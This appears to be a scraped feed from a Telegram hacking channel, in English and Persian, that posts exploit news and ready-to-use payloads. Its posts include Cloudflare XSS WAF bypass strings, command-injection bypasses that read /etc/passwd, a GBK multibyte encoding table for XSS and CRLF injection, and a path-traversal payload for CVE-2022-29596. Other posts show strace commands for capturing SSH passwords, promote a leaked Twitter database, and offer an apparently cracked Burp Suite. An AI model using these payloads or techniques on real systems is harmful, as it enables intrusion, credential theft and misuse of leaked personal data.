5.5m twitter database leak

#leak #twitter
——————
0Day.Today
@LearnExploit
@Tech_Army

Image name Xss Bypass

#XSS #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

CVE-2022-23093 ( RCE root vulnerability in FreeBSD's ping utility )

Read

#RCE
——————
0Day.Today
@LearnExploit
@Tech_Army

CVE-2022-21661

WordPress Core 5.8.2 - 'WP_Query' SQL Injection.

Github

#CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army

Cloudflare XSS bypass

<svg on =i onload=alert(domain)

#xss #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

RCE WAF Bypass

;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?

#bugbounty #RCE #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

OSINT Mind Map

#osint
——————
0Day.Today
@LearnExploit
@Tech_Army

GBK Encoding / MultiByte Attack

嘊 = %E5%98%8A = \u560a ⇒ %0A
嘍 = %E5%98%8D = \u560d ⇒ %0D
嘾 = %E5%98%BE = \u563e ⇒ %3E (>)
嘼 = %E5%98%BC = \u563c ⇒ %3C (<)
嘢 = %E5%98%A2 = \u5622 ⇒ %22 (')
嘧 = %E5%98%A7 = \u5627 ⇒ %27 (")

For XSS, CRLF, WAF bypass

#bypass #xss #crlf
——————
0Day.Today
@LearnExploit
@Tech_Army

In This Ceek

بررسی CVEهای پر سر و صدای این هفته (5 تا 11 آذر 1401)
https://vrgl.ir/ai8Vt

#ITC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army

CloudFlare XSS Bypassed

<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>

#Xss #cloudflare
——————
0Day.Today
@LearnExploit
@Tech_Army

Black Hat 2022 USA/ASIA/Europe

USA
ASIA
EUROPE

#blackhat
——————
0Day.Today
@LearnExploit
@Tech_Army

concept of deleting/writing an arbitrary file in Sysmon (CVE-2022-41120/CVE-2022-XXXXX)

Github

#windows #poc
——————
0Day.Today
@LearnExploit
@Tech_Army

جدید ترین نسخه کالی 2022.4 منتشر شد .

➕Microsoft Azure ( Microsoft Azure store )

➕More Platforms ( Generic Cloud, QEMU VM image & Vagrant libvirt )

➕Social Networks ( New homes, keeping in touch & press packs )

➕Kali NetHunter Pro ( Announcing the first release of a “true” Kali Linux on the mobile phone (PinePhone / Pro)

➕kali NetHunter ( Internal Bluetooth support, kernel porting video, firmware updates & other improvements )

➕Desktop Updates ( GNOME 43 & KDE 5.26 )

➕New Tools ( As always, various new packages added )

kali.org

#kali
——————⁧
0Day.Today
@LearnExploit
@Tech_Army

در صورتی که از کالی لینوکس قدیمی تر استفاده می کنید می تونید به صورت دستی اون رو به آخرین نسخه منتشر شده آپدیت کنید . ترمینال رو باز کنید و دستورات زیر رو وارد کنید .

┌──(LearnExploit㉿kali)-[~]
└─$ echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" | sudo tee /etc/apt/sources.list
[...]

┌──(LearnExploit㉿kali)-[~]
└─$ sudo apt update && sudo apt -y full-upgrade
[...]

┌──(LearnExploit㉿kali)-[~]
└─$ cp -vrbi /etc/skel/. ~
[...]

┌──(LearnExploit㉿kali)-[~]
└─$ [ -f /var/run/reboot-required ] && sudo reboot -f

#kali
——————
0Day.Today
@LearnExploit
@Tech_Army

Burp Suite Version 2022.12.2

آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *

Pass : 311138

#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army

CVE-2022-29596 ( MicroStrategy Enterprise Manager 2022 )

Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=_any_password_&ConnMode=1&3054= Login

#microsoft #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

CVE-2022-2414 ( Hole in pki-core )

The vulnerability allows a remote attacker to obtain the contents of arbitrary files by sending specially crafted HTTP requests.

#POC
——————
0Day.Today
@LearnExploit
@Tech_Army

Project Zero ( Exploiting CVE-2022-42703 - Bringing back the stack attack )

link

#CVE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army

A hacker with his Zero-day 📿

#Fun #0day
——————
0Day.Today
@LearnExploit
@Tech_Army

Sniffing SSH passwords

TL;DR
# pgrep -l sshd
6235 sshd
# strace -f -p 6235 -e trace=write -o capture

Link

#Sniff #SSH
——————
0Day.Today
@LearnExploit
@Tech_Army